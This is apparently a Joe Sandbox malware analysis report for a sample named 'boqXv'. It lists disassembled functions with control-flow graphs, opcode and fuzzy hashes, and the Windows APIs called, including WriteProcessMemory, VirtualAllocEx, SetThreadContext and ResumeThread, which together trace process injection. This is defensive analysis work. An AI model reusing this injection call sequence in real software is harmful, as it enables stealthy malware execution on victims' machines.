                                                • Not Executed
                                                control_flow_graph 641 25bad00-25bad0f 642 25bad3b-25bad3f 641->642 643 25bad11-25bad1e call 25b9c50 641->643 645 25bad53-25bad94 642->645 646 25bad41-25bad4b 642->646 648 25bad20 643->648 649 25bad34 643->649 652 25bada1-25badaf 645->652 653 25bad96-25bad9e 645->653 646->645 697 25bad26 call 25bb398 648->697 698 25bad26 call 25bb388 648->698 649->642 654 25badd3-25badd5 652->654 655 25badb1-25badb6 652->655 653->652 659 25badd8-25baddf 654->659 657 25badb8-25badbf call 25b9c5c 655->657 658 25badc1 655->658 656 25bad2c-25bad2e 656->649 660 25bae70-25baf30 656->660 662 25badc3-25badd1 657->662 658->662 663 25badec-25badf3 659->663 664 25bade1-25bade9 659->664 692 25baf38-25baf63 GetModuleHandleW 660->692 693 25baf32-25baf35 660->693 662->659 666 25bae00-25bae09 call 25b9c6c 663->666 667 25badf5-25badfd 663->667 664->663 672 25bae0b-25bae13 666->672 673 25bae16-25bae1b 666->673 667->666 672->673 674 25bae39-25bae46 673->674 675 25bae1d-25bae24 673->675 682 25bae69-25bae6f 674->682 683 25bae48-25bae66 674->683 675->674 677 25bae26-25bae36 call 25b9c7c call 25b9c8c 675->677 677->674 683->682 694 25baf6c-25baf80 692->694 695 25baf65-25baf6b 692->695 693->692 695->694 697->656 698->656
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 025BAF56
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 1f0f79af8497f899f9fd528cd196086528fa861de66621742a03f22f6032059c
                                                • Instruction ID: 3617ecaabad1a5d1563c0dd0a2f74640f888668dc1280ea2155e13f5272e15f6
                                                • Opcode Fuzzy Hash: 1f0f79af8497f899f9fd528cd196086528fa861de66621742a03f22f6032059c
                                                • Instruction Fuzzy Hash: 6B7122B0A00B058FDB25DF2AD04479ABBF5FF88304F10892ED08AD7A50DB74E949CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025B58ED Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 699 25b58ed-25b58f6 700 25b58f8-25b59b9 CreateActCtxA 699->700 702 25b59bb-25b59c1 700->702 703 25b59c2-25b5a1c 700->703 702->703 710 25b5a2b-25b5a2f 703->710 711 25b5a1e-25b5a21 703->711 712 25b5a31-25b5a3d 710->712 713 25b5a40-25b5a70 710->713 711->710 712->713 717 25b5a22-25b5a24 713->717 718 25b5a72-25b5af4 713->718 717->710
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 025B59A9
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 9941b7083d61fd4b4bea0d64538faa1f9915dd2699de57a09e35def70af276fe
                                                • Instruction ID: 1e2f9e441f8b4125cb7d6888146bf8977dca0cf2a29a3ded0ad7eedce362ca25
                                                • Opcode Fuzzy Hash: 9941b7083d61fd4b4bea0d64538faa1f9915dd2699de57a09e35def70af276fe
                                                • Instruction Fuzzy Hash: AF41E3B0C00619CFDB24CF99C8846CDBBF5BF49304F6480AAD409BB255DB756949CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025B44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 720 25b44b0-25b59b9 CreateActCtxA 723 25b59bb-25b59c1 720->723 724 25b59c2-25b5a1c 720->724 723->724 731 25b5a2b-25b5a2f 724->731 732 25b5a1e-25b5a21 724->732 733 25b5a31-25b5a3d 731->733 734 25b5a40-25b5a70 731->734 732->731 733->734 738 25b5a22-25b5a24 734->738 739 25b5a72-25b5af4 734->739 738->731
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 025B59A9
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 3350cc8a2e911d890e81b30feb0279301fd2f97ac4b5b8b7c66e7d4e5e5217c1
                                                • Instruction ID: 11f737a797c086151ecbd476644abf98f504cda522ae3a26dce54d2795cac68d
                                                • Opcode Fuzzy Hash: 3350cc8a2e911d890e81b30feb0279301fd2f97ac4b5b8b7c66e7d4e5e5217c1
                                                • Instruction Fuzzy Hash: A441F2B0C00719DBDB24CFA9C844BCEBBB5BF49304F6080AAD408BB255EB756949CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BD3A1 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 741 25bd3a1-25bd3a8 742 25bd3aa-25bd4ce 741->742 743 25bd367-25bd374 DuplicateHandle 741->743 745 25bd37d-25bd39a 743->745 746 25bd376-25bd37c 743->746 746->745
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD367
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: ac73f5bf9fa6b7f9b39d007b4cecf6249fe4c3df577207d2b67d9a646d738555
                                                • Instruction ID: 44cb15c553cffc153b775058d617ffd1ff63d3afc3570bb5825ed362cc460244
                                                • Opcode Fuzzy Hash: ac73f5bf9fa6b7f9b39d007b4cecf6249fe4c3df577207d2b67d9a646d738555
                                                • Instruction Fuzzy Hash: 01313EB8A81340CFE7149F60F894B693BA9F748351F118426D901DB3D9DB785C4AEB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B8799A Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 853 7b8799a-7b879ee 856 7b879fe-7b87a3d WriteProcessMemory 853->856 857 7b879f0-7b879fc 853->857 859 7b87a3f-7b87a45 856->859 860 7b87a46-7b87a76 856->860 857->856 859->860
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B87A30
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 833e27b65635f33b7e98884be6b51aab53ac821e1d60a273993bedb1501efc99
                                                • Instruction ID: ffe084a99d81a3ccc4fe7c111f781300f82810452a58ef6893da4e4f8bd00654
                                                • Opcode Fuzzy Hash: 833e27b65635f33b7e98884be6b51aab53ac821e1d60a273993bedb1501efc99
                                                • Instruction Fuzzy Hash: 4A2157B19003599FDB10DFA9C884BDEBBF5FF48314F10842AE958A7250C7789944CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B879A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B87A30
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 44ff888d8632063c4599b754b97cf4c51e9857c048b198814952d4f719642b89
                                                • Instruction ID: b3455297d81157d32621fdeabc94b2e23855904c7e07823a99ffcafc5216835a
                                                • Opcode Fuzzy Hash: 44ff888d8632063c4599b754b97cf4c51e9857c048b198814952d4f719642b89
                                                • Instruction Fuzzy Hash: C02136B19003599FDB10DFA9C885BDEBBF5FF48314F20842AE959A7250C7789944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B87A88 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B87B10
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 851eb446fcf8223707d160aeec592a24e2edcdc2ac95bdc296589f9d8cc22dab
                                                • Instruction ID: ed35815890892d9697082ed51fcc629932cc2e9308860cac46e9f192e90e07a2
                                                • Opcode Fuzzy Hash: 851eb446fcf8223707d160aeec592a24e2edcdc2ac95bdc296589f9d8cc22dab
                                                • Instruction Fuzzy Hash: 882148B19103599FDB10DFAAC880BEEFBF5FF88324F10842AE558A7250C7389545CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B87800 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B87886
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 55e835a8e411b6950ee54ac034a9452ae05df027ffaf16369ed244afd17deebf
                                                • Instruction ID: 888ffab9763bf004007e146d950e1ce067cd451c873f280acd2c7036a82e2a4c
                                                • Opcode Fuzzy Hash: 55e835a8e411b6950ee54ac034a9452ae05df027ffaf16369ed244afd17deebf
                                                • Instruction Fuzzy Hash: 46213DB1D103099FDB10DFAAC4857EEBBF4EF88314F148429D459A7240CB789545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BD2D8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD367
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: f13c69a21fe194d4f6ee75d0bfb3ccae415828e078f5c23c8f71d0622cea98c0
                                                • Instruction ID: b5c326b6b951ba23322c48be55b7c728ac0bf206abce6923e8a7d6efe97ba687
                                                • Opcode Fuzzy Hash: f13c69a21fe194d4f6ee75d0bfb3ccae415828e078f5c23c8f71d0622cea98c0
                                                • Instruction Fuzzy Hash: 1E21D2B59013189FDB10CFAAD984ADEBBF4FB48320F14802AE958A7351D374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B87A90 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B87B10
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: b77f975561b931ec65fe2ba0e2365cb79dfb0cef8b4e16f5687c434ac1b37a7f
                                                • Instruction ID: 94eb94f81c9e8ec1c6c008b709e8f27eef304b9508a4d3893322d80ab6cce818
                                                • Opcode Fuzzy Hash: b77f975561b931ec65fe2ba0e2365cb79dfb0cef8b4e16f5687c434ac1b37a7f
                                                • Instruction Fuzzy Hash: C72125B19003599FDB10DFAAC884AEEFBF5FF48324F10842AE559A7250C7389944CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B87808 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B87886
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 4ef1b7181ea893abc1c2a91a21c6a97f298d708598a94422ba5b8db37d1b399a
                                                • Instruction ID: 92a368e285e18363a6b5b12c42ac85260c614575e999a494396a395295c9407c
                                                • Opcode Fuzzy Hash: 4ef1b7181ea893abc1c2a91a21c6a97f298d708598a94422ba5b8db37d1b399a
                                                • Instruction Fuzzy Hash: A92138B1D003098FDB10DFAAC4857EEBBF4EF88324F10842AD459A7240CB78A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BD2E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD367
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: e6e2cd4acee7840082e108ae209fbf74245bd98278057c99845665a6235cce17
                                                • Instruction ID: 5fd2827caee8d3b38a861b83dd99bfa5ad9aee9a081a673bcba297e52b9f52b0
                                                • Opcode Fuzzy Hash: e6e2cd4acee7840082e108ae209fbf74245bd98278057c99845665a6235cce17
                                                • Instruction Fuzzy Hash: FD21E0B59012189FDB10CFAAD984ADEBBF8FB48320F14801AE958A3250C374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B878DA Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B8794E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: ae690d67be56fc7889290da87bbbf003d5264b851d31dbff36dbe1e3c8edf774
                                                • Instruction ID: cf90196ec7e7d69a4476dee4d7119cac0312f7d77af61e6e8ad64013e5b3d53b
                                                • Opcode Fuzzy Hash: ae690d67be56fc7889290da87bbbf003d5264b851d31dbff36dbe1e3c8edf774
                                                • Instruction Fuzzy Hash: C81159B19002499FDB10DFAAC844BDEFFF5EF88324F208419E559A7250CB35A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BAF88 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025BB3D1,00000800,00000000,00000000), ref: 025BB5C2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: b357ee839806bfc1098e65aacbd4baeef9907581ada6c84dff28a2a43b8a5c09
                                                • Instruction ID: 4921c2761f423e5129b3fb9b0090f63e983371b9b979ffd509dc14185c57269c
                                                • Opcode Fuzzy Hash: b357ee839806bfc1098e65aacbd4baeef9907581ada6c84dff28a2a43b8a5c09
                                                • Instruction Fuzzy Hash: 2D1114B69003489FDB10CF9AD448ADEFBF4FF88314F10842AD919A7250D3B5A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BB550 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025BB3D1,00000800,00000000,00000000), ref: 025BB5C2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: b6003fb588984b5d43d548e076c3b4b4067316f9f7e72171e24cc174dfded9eb
                                                • Instruction ID: c81d10c4c0ad52c7fc07f9d2564b5c122b5f17d77854297a3c932e47e2e1822a
                                                • Opcode Fuzzy Hash: b6003fb588984b5d43d548e076c3b4b4067316f9f7e72171e24cc174dfded9eb
                                                • Instruction Fuzzy Hash: 7A1112B69002089FDB10CF9AC444ADEFBF4EF88324F10842AE819A7250D375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B8731A Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: b32ccd4fbc1bf49feb60159b12fe71d60cc26bfe1edd30dd0da00a5ef54f669d
                                                • Instruction ID: ee9b8783e5791dbd48c31196616034d7b463b319aae9b60f6db96f8266339dde
                                                • Opcode Fuzzy Hash: b32ccd4fbc1bf49feb60159b12fe71d60cc26bfe1edd30dd0da00a5ef54f669d
                                                • Instruction Fuzzy Hash: 331158B19003488FDB10DFAAC4447DEFBF4EB88324F20842AD459A7240CA34A545CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B878E0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B8794E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 41059bdab351aed153326d95d954913b600c00ffac93d6720d4dd85d083ed5c1
                                                • Instruction ID: f876d048220dbd591b03013ab7e4318ade9365bd6a5109f6fed3305a42c98229
                                                • Opcode Fuzzy Hash: 41059bdab351aed153326d95d954913b600c00ffac93d6720d4dd85d083ed5c1
                                                • Instruction Fuzzy Hash: FA1126B29002599FDB10DFAAC844ADEBBF5EB88324F208419E559A7250CB75A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B87320 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7b6e4e8ee3baf632ef861cf0b8a26f643e4374d7585bc6601f8e194163d64e9c
                                                • Instruction ID: 1db1f88692c6f146310fb552cbd979ab21eb10b9550eaeb047c9dbca029559b0
                                                • Opcode Fuzzy Hash: 7b6e4e8ee3baf632ef861cf0b8a26f643e4374d7585bc6601f8e194163d64e9c
                                                • Instruction Fuzzy Hash: 1D1166B19003488FDB20DFAAC4447DEFBF4EB88324F20842AC459A7240CB34A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B8B180 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B8B1E5
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: d928c6e0362bf9f30d8c53686e593124dd876354699948f0209631f1bf093f9c
                                                • Instruction ID: b521ede9abb45043b1513459e78ccbef67add0a1cdd0c9f5126d9e115b181c91
                                                • Opcode Fuzzy Hash: d928c6e0362bf9f30d8c53686e593124dd876354699948f0209631f1bf093f9c
                                                • Instruction Fuzzy Hash: 7F1122B59003499FDB10DF9AC884BDFFBF8EB48324F10841AE558A7200C374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BAEF0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 025BAF56
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6418261dca8ffe123c58b51da04fd9e5b35ec0a1b70d7e24eb60f0ff2b01eac1
                                                • Instruction ID: b31a2e6b66d385c3cf8f59fdf5bf8775b1c50a92038340a2d91734d27a24d947
                                                • Opcode Fuzzy Hash: 6418261dca8ffe123c58b51da04fd9e5b35ec0a1b70d7e24eb60f0ff2b01eac1
                                                • Instruction Fuzzy Hash: 6811E0B6D003498FDB10DF9AC448ADEFBF4AF88324F10846AD469B7250C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B87CD0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B8B1E5
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: b42f4be0473a1ffd5e697f50fea69457a25024840a1371da7090817b2d0d1d07
                                                • Instruction ID: d8ff7ef4b6f03cb08ef48075e13f393393fc84538be4a9a24a14b955a0f451ab
                                                • Opcode Fuzzy Hash: b42f4be0473a1ffd5e697f50fea69457a25024840a1371da7090817b2d0d1d07
                                                • Instruction Fuzzy Hash: 1611F2B59103499FEB10EF9AC849BDFBBF8EB48324F10845AE559A7200C375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A1D36C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc5dceda16f81121b4101469e940fe6d35950f30fc0a1757709824fae8beec4d
                                                • Instruction ID: 93c14653c1df90446ead95b82b28a7c8950711707efb178bd9145772590a0787
                                                • Opcode Fuzzy Hash: bc5dceda16f81121b4101469e940fe6d35950f30fc0a1757709824fae8beec4d
                                                • Instruction Fuzzy Hash: DB212675544204EFCB04DF14D5C4B66BFA5FB84314F24C56DE8094F296C33AE886CA62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A1D1B4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62700e5a61808801666f0184320905bddc13c9c93adebaab04775d9cd22b590b
                                                • Instruction ID: 77e557903849150181521b41b2f8d5b88df5103ee1f5cf42d5983c1ee2052c52
                                                • Opcode Fuzzy Hash: 62700e5a61808801666f0184320905bddc13c9c93adebaab04775d9cd22b590b
                                                • Instruction Fuzzy Hash: 80212671604300EFCB05DF14C5C0BA6BFA5FB94314F20C66DEC094B256C336D886CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A1D367 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 20a5d579239d9d177e138690714e66528a9851eee1e612cf29fb8860b85df53b
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: BD119D79544280DFDB06CF14D5C4B55BFB1FB84318F24C6AED8494B656C33AE88ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A1D1AF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: fd44a0200b7355a3b687d5cddc908e0c2bc36d8d7e2b3bc9da6a8f88ad92c728
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: BB119D75504280DFDB06CF14D5C4B95BFA1FB94318F24C6AADC494B656C33AD84ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:172
                                                Total number of Limit Nodes:18
